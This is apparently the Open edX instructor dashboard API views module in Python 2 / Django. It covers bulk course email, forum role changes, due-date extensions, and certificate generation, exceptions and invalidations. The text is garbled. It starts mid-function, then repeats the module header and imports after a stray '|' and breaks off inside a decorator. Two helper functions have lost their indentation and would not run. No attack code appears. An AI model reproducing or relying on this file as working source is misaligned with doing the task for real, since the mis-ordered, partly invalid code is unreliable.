            'first_name': user.first_name,
            'last_name': user.last_name,
        }
    response_payload = {
        'course_id': course_id.to_deprecated_string(),
        rolename: map(extract_user_info, users),
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(send_to="sending to whom", subject="subject line", message="message text")
def send_email(request, course_id):
    """
    Send an email to self, staff, or everyone involved in a course.

    Query Parameters:
    - 'send_to' specifies what group the email should be sent to
       Options are defined by the CourseEmail model in
       lms/djangoapps/bulk_email/models.py
    - 'subject' specifies email's subject
    - 'message' specifies email's content
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    if not BulkEmailFlag.feature_enabled(course_id):
        return HttpResponseForbidden("Email is not enabled for this course.")
    # NOTE(review): malformed JSON in 'send_to' will raise ValueError here and
    # surface as a 500 -- confirm whether the caller guarantees valid JSON.
    targets = json.loads(request.POST.get("send_to"))
    subject = request.POST.get("subject")
    message = request.POST.get("message")
    # allow two branding points to come from Microsites: which CourseEmailTemplate should be used
    # and what the 'from' field in the email should be
    #
    # If these are None (because we are not in a Microsite or they are undefined in Microsite config) then
    # the system will use normal system defaults
    template_name = microsite.get_value('course_email_template_name')
    from_addr = microsite.get_value('course_email_from_addr')
    # Create the CourseEmail object. This is saved immediately, so that
    # any transaction that has been pending up to this point will also be
    # committed.
    try:
        email = CourseEmail.create(
            course_id,
            request.user,
            targets,
            subject, message,
            template_name=template_name,
            from_addr=from_addr
        )
    except ValueError as err:
        # CourseEmail.create rejects invalid targets with ValueError.
        return HttpResponseBadRequest(repr(err))
    # Submit the task, so that the correct InstructorTask object gets created (for monitoring purposes)
    instructor_task.api.submit_bulk_course_email(request, course_id, email.id)
    response_payload = {
        'course_id': course_id.to_deprecated_string(),
        'success': True,
    }
    return JsonResponse(response_payload)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params(
    unique_student_identifier="email or username of user to change access",
    rolename="the forum role",
    action="'allow' or 'revoke'",
)
@common_exceptions_400
def update_forum_role_membership(request, course_id):
    """
    Modify user's forum role.

    The requesting user must be at least staff.
    Staff forum admins can access all roles EXCEPT for FORUM_ROLE_ADMINISTRATOR
        which is limited to instructors.
    No one can revoke an instructors FORUM_ROLE_ADMINISTRATOR status.

    Query parameters:
    - `unique_student_identifier` is the target user's email or username
    - `rolename` is one of [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]
    - `action` is one of ['allow', 'revoke']
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_id)
    has_instructor_access = has_access(request.user, 'instructor', course)
    has_forum_admin = has_forum_access(
        request.user, course_id, FORUM_ROLE_ADMINISTRATOR
    )
    unique_student_identifier = request.GET.get('unique_student_identifier')
    rolename = request.GET.get('rolename')
    action = request.GET.get('action')
    # default roles require either (staff & forum admin) or (instructor)
    if not (has_forum_admin or has_instructor_access):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # EXCEPT FORUM_ROLE_ADMINISTRATOR requires (instructor)
    if rolename == FORUM_ROLE_ADMINISTRATOR and not has_instructor_access:
        return HttpResponseBadRequest("Operation requires instructor access.")
    # Reject any rolename outside the fixed set of supported forum roles.
    if rolename not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized rolename '{}'.".format(rolename)
        ))
    user = get_student_from_identifier(unique_student_identifier)
    try:
        update_forum_role(course_id, user, rolename, action)
    except Role.DoesNotExist:
        return HttpResponseBadRequest("Role does not exist.")
    response_payload = {
        'course_id': course_id.to_deprecated_string(),
        'action': action,
    }
    return JsonResponse(response_payload)
@require_POST
def get_user_invoice_preference(request, course_id):  # pylint: disable=unused-argument
    """
    Gets invoice copy user's preferences.
    """
    stored_value = get_user_preference(request.user, INVOICE_KEY)
    # Default to sending an invoice copy unless a stored preference says otherwise.
    invoice_copy = True if stored_value is None else stored_value == 'True'
    return JsonResponse({
        'invoice_copy': invoice_copy
    })
def _display_unit(unit):
"""
Gets string for displaying unit to user.
"""
name = getattr(unit, 'display_name', None)
if name:
return u'{0} ({1})'.format(name, unit.location.to_deprecated_string())
else:
return unit.location.to_deprecated_string()
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student', 'url', 'due_datetime')
def change_due_date(request, course_id):
    """
    Grants a due date extension to a student for a particular unit.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    student = require_student_from_identifier(request.GET.get('student'))
    unit = find_unit(course, request.GET.get('url'))
    due_date = parse_datetime(request.GET.get('due_datetime'))
    set_due_date_extension(course, unit, student, due_date)
    confirmation = _(
        'Successfully changed due date for student {0} for {1} '
        'to {2}').format(student.profile.name, _display_unit(unit),
                         due_date.strftime('%Y-%m-%d %H:%M'))
    return JsonResponse(confirmation)
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student', 'url')
def reset_due_date(request, course_id):
    """
    Rescinds a due date extension for a student on a particular unit.
    """
    course = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(course_id))
    student = require_student_from_identifier(request.GET.get('student'))
    unit = find_unit(course, request.GET.get('url'))
    set_due_date_extension(course, unit, student, None)
    if not getattr(unit, "due", None):
        # It's possible the normal due date was deleted after an extension was granted:
        return JsonResponse(
            _("Successfully removed invalid due date extension (unit has no due date).")
        )
    confirmation = _(
        'Successfully reset due date for student {0} for {1} '
        'to {2}').format(student.profile.name, _display_unit(unit),
                         unit.due.strftime('%Y-%m-%d %H:%M'))
    return JsonResponse(confirmation)
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('url')
def show_unit_extensions(request, course_id):
    """
    Shows all of the students which have due date extensions for the given unit.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    unit = find_unit(course, request.GET.get('url'))
    return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_query_params('student')
def show_student_extensions(request, course_id):
    """
    Shows all of the due date extensions granted to a particular student in a
    particular course.
    """
    student = require_student_from_identifier(request.GET.get('student'))
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    return JsonResponse(dump_student_extensions(course, student))
def _split_input_list(str_list):
"""
Separate out individual student email from the comma, or space separated string.
e.g.
in: "Lorem@ipsum.dolor, sit@amet.consectetur\nadipiscing@elit.Aenean\r convallis@at.lacus\r, ut@lacinia.Sed"
out: ['Lorem@ipsum.dolor', 'sit@amet.consectetur', 'adipiscing@elit.Aenean', 'convallis@at.lacus', 'ut@lacinia.Sed']
`str_list` is a string coming from an input text area
returns a list of separated values
"""
new_list = re.split(r'[\n\r\s,]', str_list)
new_list = [s.strip() for s in new_list]
new_list = [s for s in new_list if s != '']
return new_list
def _instructor_dash_url(course_key, section=None):
    """Return the URL for a section in the instructor dashboard.

    Arguments:
        course_key (CourseKey)

    Keyword Arguments:
        section (str): The name of the section to load.

    Returns:
        unicode: The URL of a section in the instructor dashboard.
    """
    # NOTE: `unicode` is the Python 2 builtin; this module has not been
    # ported to Python 3.
    url = reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)})
    if section is not None:
        # Sections are selected client-side via a URL fragment.
        url += u'#view-{section}'.format(section=section)
    return url
@require_global_staff
@require_POST
def generate_example_certificates(request, course_id=None):  # pylint: disable=unused-argument
    """Start generating a set of example certificates.

    Example certificates are used to verify that certificates have
    been configured correctly for the course.

    Redirects back to the intructor dashboard once certificate
    generation has begun.
    """
    course_key = CourseKey.from_string(course_id)
    certs_api.generate_example_certificates(course_key)
    dashboard_url = _instructor_dash_url(course_key, section='certificates')
    return redirect(dashboard_url)
@require_global_staff
@require_POST
def enable_certificate_generation(request, course_id=None):
    """Enable/disable self-generated certificates for a course.

    Once self-generated certificates have been enabled, students
    who have passed the course will be able to generate certificates.

    Redirects back to the intructor dashboard once the
    setting has been updated.
    """
    course_key = CourseKey.from_string(course_id)
    # Anything other than the literal string 'true' disables generation.
    enabled = request.POST.get('certificates-enabled', 'false') == 'true'
    certs_api.set_cert_generation_enabled(course_key, enabled)
    return redirect(_instructor_dash_url(course_key, section='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def mark_student_can_skip_entrance_exam(request, course_id):  # pylint: disable=invalid-name
    """
    Mark a student to skip entrance exam.
    Takes `unique_student_identifier` as required POST parameter.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    student_identifier = request.POST.get('unique_student_identifier')
    student = get_student_from_identifier(student_identifier)
    # `created` is False when the skip record already existed.
    __, created = EntranceExamConfiguration.objects.get_or_create(user=student, course_id=course_key)
    template = (
        _('This student (%s) will skip the entrance exam.')
        if created else
        _('This student (%s) is already allowed to skip the entrance exam.')
    )
    return JsonResponse({
        'message': template % student_identifier,
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_generation(request, course_id):
    """
    Start generating certificates for all students enrolled in given course.
    """
    course_key = CourseKey.from_string(course_id)
    generation_task = instructor_task.api.generate_certificates_for_students(request, course_key)
    return JsonResponse({
        'message': _('Certificate generation task for all students of this course has been started. '
                     'You can view the status of the generation task in the "Pending Tasks" section.'),
        'task_id': generation_task.task_id
    })
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def start_certificate_regeneration(request, course_id):
    """
    Start regenerating certificates for students whose certificate statuses lie with in 'certificate_statuses'
    entry in POST data.

    Returns JsonResponse with success message on success, or a 400 with an
    error message for empty/invalid status selections or an already-running task.
    """
    course_key = CourseKey.from_string(course_id)
    certificates_statuses = request.POST.getlist('certificate_statuses', [])
    if not certificates_statuses:
        return JsonResponse(
            {'message': _('Please select one or more certificate statuses that require certificate regeneration.')},
            status=400
        )
    # Check if the selected statuses are allowed
    allowed_statuses = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
    if not set(certificates_statuses).issubset(allowed_statuses):
        return JsonResponse(
            {'message': _('Please select certificate statuses from the list only.')},
            status=400
        )
    try:
        instructor_task.api.regenerate_certificates(request, course_key, certificates_statuses)
    except AlreadyRunningError as error:
        # A regeneration task is already queued/running for this course.
        return JsonResponse({'message': error.message}, status=400)
    response_payload = {
        'message': _('Certificate regeneration task has been started. '
                     'You can view the status of the generation task in the "Pending Tasks" section.'),
        'success': True
    }
    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_exception_view(request, course_id):
    """
    Add/Remove students to/from certificate white list.

    POST adds an exception; DELETE removes one.

    :param request: HttpRequest object
    :param course_id: course identifier of the course for whom to add/remove certificates exception.
    :return: JsonResponse object with success/error message or certificate exception data.
    """
    course_key = CourseKey.from_string(course_id)
    # Validate request data and return error response in case of invalid data
    try:
        certificate_exception, student = parse_request_data_and_get_user(request, course_key)
    except ValueError as error:
        return JsonResponse({'success': False, 'message': error.message}, status=400)
    # Add new Certificate Exception for the student passed in request data
    if request.method == 'POST':
        try:
            exception = add_certificate_exception(course_key, student, certificate_exception)
        except ValueError as error:
            # e.g. the student is already on the white list.
            return JsonResponse({'success': False, 'message': error.message}, status=400)
        return JsonResponse(exception)
    # Remove Certificate Exception for the student passed in request data
    elif request.method == 'DELETE':
        try:
            remove_certificate_exception(course_key, student)
        except ValueError as error:
            return JsonResponse({'success': False, 'message': error.message}, status=400)
        # 204: removal succeeded, nothing to return.
        return JsonResponse({}, status=204)
def add_certificate_exception(course_key, student, certificate_exception):
    """
    Add a certificate exception to CertificateWhitelist table.
    Raises ValueError in case Student is already white listed.

    :param course_key: identifier of the course whose certificate exception will be added.
    :param student: User object whose certificate exception will be added.
    :param certificate_exception: A dict object containing certificate exception info.
    :return: CertificateWhitelist item in dict format containing certificate exception info.
    """
    # Reject duplicates up front so the caller gets a clear error message.
    if len(CertificateWhitelist.get_certificate_white_list(course_key, student)) > 0:
        raise ValueError(
            _("Student (username/email={user}) already in certificate exception list.").format(user=student.username)
        )
    certificate_white_list, __ = CertificateWhitelist.objects.get_or_create(
        user=student,
        course_id=course_key,
        defaults={
            'whitelist': True,
            'notes': certificate_exception.get('notes', '')
        }
    )
    # A certificate may already have been generated for this student; if so
    # its creation date is reported back to the caller.
    generated_certificate = GeneratedCertificate.eligible_certificates.filter(
        user=student,
        course_id=course_key,
        status=CertificateStatuses.downloadable,
    ).first()
    exception = dict({
        'id': certificate_white_list.id,
        'user_email': student.email,
        'user_name': student.username,
        'user_id': student.id,
        # None (falsy short-circuit) when no downloadable certificate exists.
        'certificate_generated': generated_certificate and generated_certificate.created_date.strftime("%B %d, %Y"),
        'created': certificate_white_list.created.strftime("%A, %B %d, %Y"),
    })
    return exception
def remove_certificate_exception(course_key, student):
    """
    Remove certificate exception for given course and student from CertificateWhitelist table and
    invalidate its GeneratedCertificate if present.

    Raises ValueError in case no exception exists for the student in the given course.

    :param course_key: identifier of the course whose certificate exception needs to be removed.
    :param student: User object whose certificate exception needs to be removed.
    :return:
    """
    try:
        white_list_entry = CertificateWhitelist.objects.get(user=student, course_id=course_key)
    except ObjectDoesNotExist:
        raise ValueError(
            _('Certificate exception (user={user}) does not exist in certificate white list. '
              'Please refresh the page and try again.').format(user=student.username)
        )

    try:
        certificate = GeneratedCertificate.objects.get(  # pylint: disable=no-member
            user=student,
            course_id=course_key
        )
        certificate.invalidate()
        log.info(
            u'Certificate invalidated for %s in course %s when removed from certificate exception list',
            student.username,
            course_key
        )
    except ObjectDoesNotExist:
        # No certificate has been generated yet, so there is nothing to invalidate;
        # just fall through and drop the white-list entry.
        pass

    white_list_entry.delete()
def parse_request_data_and_get_user(request, course_key):
    """
    Parse request data into Certificate Exception and User object.

    Certificate Exception is the dict object containing information about certificate exception.

    :param request:
    :param course_key: Course Identifier of the course for whom to process certificate exception
    :return: key-value pairs containing certificate exception data and User object
    """
    certificate_exception = parse_request_data(request)

    # The exception payload may carry either a username or an email; accept either.
    user_identifier = certificate_exception.get('user_name', '') or certificate_exception.get('user_email', '')
    if not user_identifier:
        raise ValueError(_('Student username/email field is required and can not be empty. '
                           'Kindly fill in username/email and then press "Add to Exception List" button.'))

    return certificate_exception, get_student(user_identifier, course_key)
def parse_request_data(request):
    """
    Parse and return request data, raise ValueError in case of invalid JSON data.

    :param request: HttpRequest request object.
    :return: dict object containing parsed json data.
    """
    # An empty body is treated as an empty JSON object rather than an error.
    raw_body = request.body or '{}'
    try:
        parsed_data = json.loads(raw_body)
    except ValueError:
        raise ValueError(_('The record is not in the correct format. Please add a valid username or email address.'))

    return parsed_data
def get_student(username_or_email, course_key):
    """
    Retrieve and return User object from db, raise ValueError
    if user does not exist or is not enrolled in the given course.

    :param username_or_email: String containing either user name or email of the student.
    :param course_key: CourseKey object identifying the current course.
    :return: User object
    """
    try:
        student = get_user_by_username_or_email(username_or_email)
    except ObjectDoesNotExist:
        raise ValueError(
            _("{user} does not exist in the LMS. Please check your spelling and retry.").format(user=username_or_email)
        )

    # Only learners actually enrolled in the course are valid targets.
    if CourseEnrollment.is_enrolled(student, course_key):
        return student

    raise ValueError(
        _("{user} is not enrolled in this course. Please check your spelling and retry.").format(user=username_or_email)
    )
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_certificate_exceptions(request, course_id, generate_for=None):
    """
    Generate Certificate for students in the Certificate White List.

    :param request: HttpRequest object,
    :param course_id: course identifier of the course for whom to generate certificates
    :param generate_for: string to identify whether to generate certificates for 'all' or 'new'
            additions to the certificate white-list
    :return: JsonResponse object containing success/failure message and certificate exception data
    """
    course_key = CourseKey.from_string(course_id)

    # Map the requested scope onto the student-set identifiers understood by the task API.
    student_set_for_scope = {
        'all': 'all_whitelisted',
        'new': 'whitelisted_not_generated',
    }
    students = student_set_for_scope.get(generate_for)
    if students is None:
        # generate_for must be supplied and must name a known scope.
        return JsonResponse(
            {
                'success': False,
                'message': _('Invalid data, generate_for must be "new" or "all".'),
            },
            status=400
        )

    instructor_task.api.generate_certificates_for_students(request, course_key, student_set=students)

    return JsonResponse({
        'success': True,
        'message': _('Certificate generation started for white listed students.'),
    })
@csrf_exempt
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_POST
def generate_bulk_certificate_exceptions(request, course_id):  # pylint: disable=invalid-name
    """
    Add Students to certificate white list from the uploaded csv file.
    :return response in dict format.
    {
        general_errors: [errors related to csv file e.g. csv uploading, csv attachment, content reading etc. ],
        row_errors: {
            data_format_error: [users/data in csv file that are not well formatted],
            user_not_exist: [csv with none exiting users in LMS system],
            user_already_white_listed: [users that are already white listed],
            user_not_enrolled: [rows with not enrolled users in the given course]
        },
        success: [list of successfully added users to the certificate white list model]
    }
    """
    # Expected CSV row layout: column 0 is username-or-email, column 1 is free-text notes.
    user_index = 0
    notes_index = 1
    row_errors_key = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
    course_key = CourseKey.from_string(course_id)
    students, general_errors, success = [], [], []
    row_errors = {key: [] for key in row_errors_key}

    def build_row_errors(key, _user, row_count):
        """
        inner method to build dict of csv data as row errors.
        """
        row_errors[key].append(_('user "{user}" in row# {row}').format(user=_user, row=row_count))

    if 'students_list' in request.FILES:
        try:
            upload_file = request.FILES.get('students_list')
            if upload_file.name.endswith('.csv'):
                students = [row for row in csv.reader(upload_file.read().splitlines())]
            else:
                general_errors.append(_('Make sure that the file you upload is in CSV format with no '
                                        'extraneous characters or rows.'))

        except Exception:  # pylint: disable=broad-except
            general_errors.append(_('Could not read uploaded file.'))
        finally:
            # Always release the uploaded file handle, even on read failure.
            upload_file.close()

        row_num = 0
        for student in students:
            row_num += 1
            # verify that we have exactly two column in every row either email or username and notes but allow for
            # blank lines
            if len(student) != 2:
                if len(student) > 0:
                    build_row_errors('data_format_error', student[user_index], row_num)
                    log.info(u'invalid data/format in csv row# %s', row_num)
                continue

            user = student[user_index]
            try:
                # `user` is rebound from the raw identifier string to the User object on success.
                user = get_user_by_username_or_email(user)
            except ObjectDoesNotExist:
                build_row_errors('user_not_exist', user, row_num)
                log.info(u'student %s does not exist', user)
            else:
                if len(CertificateWhitelist.get_certificate_white_list(course_key, user)) > 0:
                    build_row_errors('user_already_white_listed', user, row_num)
                    log.warning(u'student %s already exist.', user.username)

                # make sure user is enrolled in course
                elif not CourseEnrollment.is_enrolled(user, course_key):
                    build_row_errors('user_not_enrolled', user, row_num)
                    log.warning(u'student %s is not enrolled in course.', user.username)

                else:
                    CertificateWhitelist.objects.create(
                        user=user,
                        course_id=course_key,
                        whitelist=True,
                        notes=student[notes_index]
                    )
                    success.append(_('user "{username}" in row# {row}').format(username=user.username, row=row_num))

    else:
        general_errors.append(_('File is not attached.'))

    results = {
        'general_errors': general_errors,
        'row_errors': row_errors,
        'success': success
    }

    return JsonResponse(results)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_global_staff
@require_http_methods(['POST', 'DELETE'])
def certificate_invalidation_view(request, course_id):
    """
    Invalidate/Re-Validate students to/from certificate.

    :param request: HttpRequest object
    :param course_id: course identifier of the course for whom to add/remove certificates exception.
    :return: JsonResponse object with success/error message or certificate invalidation data.
    """
    course_key = CourseKey.from_string(course_id)

    # Both verbs need the parsed payload and the student's generated certificate;
    # invalid data short-circuits to a 400 before touching anything.
    try:
        certificate_invalidation_data = parse_request_data(request)
        certificate = validate_request_data_and_get_certificate(certificate_invalidation_data, course_key)
    except ValueError as error:
        return JsonResponse({'message': error.message}, status=400)

    if request.method == 'POST':
        # POST invalidates the student's certificate for this course.
        try:
            invalidation = invalidate_certificate(request, certificate, certificate_invalidation_data)
        except ValueError as error:
            return JsonResponse({'message': error.message}, status=400)
        return JsonResponse(invalidation)

    elif request.method == 'DELETE':
        # DELETE re-validates (restores) the student's certificate.
        try:
            re_validate_certificate(request, course_key, certificate)
        except ValueError as error:
            return JsonResponse({'message': error.message}, status=400)
        return JsonResponse({}, status=204)
def invalidate_certificate(request, generated_certificate, certificate_invalidation_data):
    """
    Invalidate given GeneratedCertificate and add CertificateInvalidation record for future reference or re-validation.

    :param request: HttpRequest object
    :param generated_certificate: GeneratedCertificate object, the certificate we want to invalidate
    :param certificate_invalidation_data: dict object containing data for CertificateInvalidation.
    :return: dict object containing updated certificate invalidation data.
    """
    # Refuse to double-invalidate: an active invalidation must not already exist.
    active_invalidations = CertificateInvalidation.get_certificate_invalidations(
        generated_certificate.course_id,
        generated_certificate.user,
    )
    if len(active_invalidations) > 0:
        raise ValueError(
            _("Certificate of {user} has already been invalidated. Please check your spelling and retry.").format(
                user=generated_certificate.user.username,
            )
        )

    # Only a currently-valid certificate can be invalidated.
    if not generated_certificate.is_valid():
        raise ValueError(
            _("Certificate for student {user} is already invalid, kindly verify that certificate was generated "
              "for this student and then proceed.").format(user=generated_certificate.user.username)
        )

    # Record the invalidation so it can be audited or reversed later.
    invalidation, __ = CertificateInvalidation.objects.update_or_create(
        generated_certificate=generated_certificate,
        defaults={
            'invalidated_by': request.user,
            'notes': certificate_invalidation_data.get("notes", ""),
            'active': True,
        }
    )

    # Flip the certificate itself to the invalidated state.
    generated_certificate.invalidate()

    return {
        'id': invalidation.id,
        'user': invalidation.generated_certificate.user.username,
        'invalidated_by': invalidation.invalidated_by.username,
        'created': invalidation.created.strftime("%B %d, %Y"),
        'notes': invalidation.notes,
    }
def re_validate_certificate(request, course_key, generated_certificate):
    """
    Remove certificate invalidation from db and start certificate generation task for this student.

    Raises ValueError if no certificate invalidation exists for the given certificate.

    :param request: HttpRequest object
    :param course_key: CourseKey object identifying the current course.
    :param generated_certificate: GeneratedCertificate object of the student for the given course
    """
    try:
        invalidation = CertificateInvalidation.objects.get(generated_certificate=generated_certificate)
    except ObjectDoesNotExist:
        raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))

    # Invalidation found: switch it off before regenerating the certificate.
    invalidation.deactivate()

    # Kick off certificate generation for just this one student.
    student = invalidation.generated_certificate.user
    instructor_task.api.generate_certificates_for_students(
        request, course_key, student_set="specific_student", specific_student_id=student.id
    )
def validate_request_data_and_get_certificate(certificate_invalidation, course_key):
    """
    Fetch and return GeneratedCertificate of the student passed in request data for the given course.

    Raises ValueError in case of missing student username/email or
    if student does not have certificate for the given course.

    :param certificate_invalidation: dict containing certificate invalidation data
    :param course_key: CourseKey object identifying the current course.
    :return: GeneratedCertificate object of the student for the given course
    """
    user_identifier = certificate_invalidation.get("user")
    if not user_identifier:
        raise ValueError(
            _('Student username/email field is required and can not be empty. '
              'Kindly fill in username/email and then press "Invalidate Certificate" button.')
        )

    student = get_student(user_identifier, course_key)

    certificate = GeneratedCertificate.certificate_for_student(student, course_key)
    if certificate:
        return certificate

    raise ValueError(_(
        "The student {student} does not have certificate for the course {course}. Kindly verify student "
        "username/email and the selected course are correct and try again."
    ).format(student=student.username, course=course_key.course))
| """
Instructor Dashboard API views
JSON views which the instructor dashboard requests.
Many of these GETs may become PUTs in the future.
"""
import StringIO
import json
import logging
import re
import time
from django.conf import settings
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_exempt
from django.views.decorators.http import require_POST, require_http_methods
from django.views.decorators.cache import cache_control
from django.core.exceptions import ValidationError, PermissionDenied
from django.core.mail.message import EmailMessage
from django.core.exceptions import ObjectDoesNotExist
from django.db import IntegrityError, transaction
from django.core.urlresolvers import reverse
from django.core.validators import validate_email
from django.utils.translation import ugettext as _
from django.http import HttpResponse, HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotFound
from django.utils.html import strip_tags
from django.shortcuts import redirect
import string
import random
import unicodecsv
import decimal
from student import auth
from student.roles import GlobalStaff, CourseSalesAdminRole, CourseFinanceAdminRole
from util.file import (
store_uploaded_file, course_and_time_based_filename_generator,
FileValidationException, UniversalNewlineIterator
)
from util.json_request import JsonResponse, JsonResponseBadRequest
from instructor.views.instructor_task_helpers import extract_email_features, extract_task_features
from microsite_configuration import microsite
from courseware.access import has_access
from courseware.courses import get_course_with_access, get_course_by_id
from django.contrib.auth.models import User
from django_comment_client.utils import has_forum_access
from django_comment_common.models import (
Role,
FORUM_ROLE_ADMINISTRATOR,
FORUM_ROLE_MODERATOR,
FORUM_ROLE_COMMUNITY_TA,
)
from edxmako.shortcuts import render_to_string
from courseware.models import StudentModule
from shoppingcart.models import (
Coupon,
CourseRegistrationCode,
RegistrationCodeRedemption,
Invoice,
CourseMode,
CourseRegistrationCodeInvoiceItem,
)
from student.models import (
CourseEnrollment, unique_id_for_user, anonymous_id_for_user,
UserProfile, Registration, EntranceExamConfiguration,
ManualEnrollmentAudit, UNENROLLED_TO_ALLOWEDTOENROLL, ALLOWEDTOENROLL_TO_ENROLLED,
ENROLLED_TO_ENROLLED, ENROLLED_TO_UNENROLLED, UNENROLLED_TO_ENROLLED,
UNENROLLED_TO_UNENROLLED, ALLOWEDTOENROLL_TO_UNENROLLED, DEFAULT_TRANSITION_STATE
)
import instructor_task.api
from instructor_task.api_helper import AlreadyRunningError
from instructor_task.models import ReportStore
import instructor.enrollment as enrollment
from instructor.enrollment import (
get_user_email_language,
enroll_email,
send_mail_to_student,
get_email_params,
send_beta_role_email,
unenroll_email,
)
from instructor.access import list_with_level, allow_access, revoke_access, ROLES, update_forum_role
import instructor_analytics.basic
import instructor_analytics.distributions
import instructor_analytics.csvs
import csv
from openedx.core.djangoapps.user_api.preferences.api import get_user_preference, set_user_preference
from openedx.core.djangolib.markup import HTML, Text
from instructor.views import INVOICE_KEY
from submissions import api as sub_api # installed from the edx-submissions repository
from certificates import api as certs_api
from certificates.models import CertificateWhitelist, GeneratedCertificate, CertificateStatuses, CertificateInvalidation
from bulk_email.models import CourseEmail, BulkEmailFlag
from student.models import get_user_by_username_or_email
from .tools import (
dump_student_extensions,
dump_module_extensions,
find_unit,
get_student_from_identifier,
require_student_from_identifier,
handle_dashboard_error,
parse_datetime,
set_due_date_extension,
strip_if_string,
)
from opaque_keys.edx.keys import CourseKey, UsageKey
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from opaque_keys import InvalidKeyError
from openedx.core.djangoapps.course_groups.cohorts import is_course_cohorted
from openedx.core.djangoapps.theming import helpers as theming_helpers
# Module-level logger named after this module's import path.
log = logging.getLogger(__name__)
def common_exceptions_400(func):
    """
    Catches common exceptions and renders matching 400 errors.
    (decorator without arguments)
    """
    def wrapped(request, *args, **kwargs):  # pylint: disable=missing-docstring
        prefers_json = (request.is_ajax() or
                        request.META.get("HTTP_ACCEPT", "").startswith("application/json"))

        def render_400(message):
            # JSON body for AJAX/JSON clients, plain-text 400 otherwise.
            if prefers_json:
                return JsonResponse({"error": message}, 400)
            return HttpResponseBadRequest(message)

        try:
            return func(request, *args, **kwargs)
        except User.DoesNotExist:
            return render_400(_("User does not exist."))
        except AlreadyRunningError:
            return render_400(_("Task is already running."))
    return wrapped
def require_post_params(*args, **kwargs):
    """
    Checks for required parameters or renders a 400 error.
    (decorator with arguments)

    `args` is a *list of required POST parameter names.
    `kwargs` is a **dict of required POST parameter names
        to string explanations of the parameter
    """
    # Normalize both calling styles into (name, explanation-or-None) pairs,
    # e.g. [('action', 'enroll or unenroll'), ('emails', None)]
    required_params = [(arg, None) for arg in args] + [(key, kwargs[key]) for key in kwargs]

    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(*args, **kwargs):  # pylint: disable=missing-docstring
            request = args[0]

            missing_report = {
                'error': 'Missing required query parameter(s)',
                'parameters': [],
                'info': {},
            }

            # A unique sentinel distinguishes "absent" from any real POST value.
            sentinel = object()
            for param, explanation in required_params:
                if request.POST.get(param, sentinel) is sentinel:
                    missing_report['parameters'].append(param)
                    missing_report['info'][param] = explanation

            if missing_report['parameters']:
                return JsonResponse(missing_report, status=400)
            return func(*args, **kwargs)
        return wrapped
    return decorator
def require_level(level):
    """
    Decorator with argument that requires an access level of the requesting
    user. If the requirement is not satisfied, returns an
    HttpResponseForbidden (403).

    Assumes that request is in args[0].
    Assumes that course_id is in kwargs['course_id'].

    `level` is in ['instructor', 'staff']
    if `level` is 'staff', instructors will also be allowed, even
    if they are not in the staff group.
    """
    # Fail fast at decoration time on an unsupported level string.
    if level not in ('instructor', 'staff'):
        raise ValueError("unrecognized level '{}'".format(level))

    def decorator(func):  # pylint: disable=missing-docstring
        def wrapped(*args, **kwargs):  # pylint: disable=missing-docstring
            request = args[0]
            course = get_course_by_id(CourseKey.from_string(kwargs['course_id']))

            if not has_access(request.user, level, course):
                return HttpResponseForbidden()
            return func(*args, **kwargs)
        return wrapped
    return decorator
def require_global_staff(func):
    """View decorator that requires that the user have global staff permissions. """
    def wrapped(request, *args, **kwargs):  # pylint: disable=missing-docstring
        # Guard clause: reject non-staff users before invoking the view.
        if not GlobalStaff().has_user(request.user):
            return HttpResponseForbidden(
